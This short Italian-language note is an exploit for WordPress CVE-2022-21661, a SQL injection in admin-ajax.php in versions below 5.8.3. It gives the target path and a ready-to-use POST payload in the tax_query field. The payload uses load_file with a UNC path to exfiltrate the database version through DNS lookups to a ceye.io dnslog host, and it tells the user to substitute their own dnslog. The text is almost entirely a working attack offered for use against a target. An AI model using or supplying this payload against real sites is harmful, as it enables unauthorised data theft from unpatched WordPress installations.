
Exploit per WordPress CVE-2022-21661 vulnerabilità di SQL injection in admin-ajax.php, utilizzando esfiltrazione di dati out-of-band tramite DNS per versioni inferiori alla 5.8.3.
#version<5.8.3
percorso:http://your target/wp-admin/admin-ajax.php
Il tipo di injection è out-of-band, devi specificare tu stesso il dnslog e sostituire ceye.io
DATI POST-:{"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}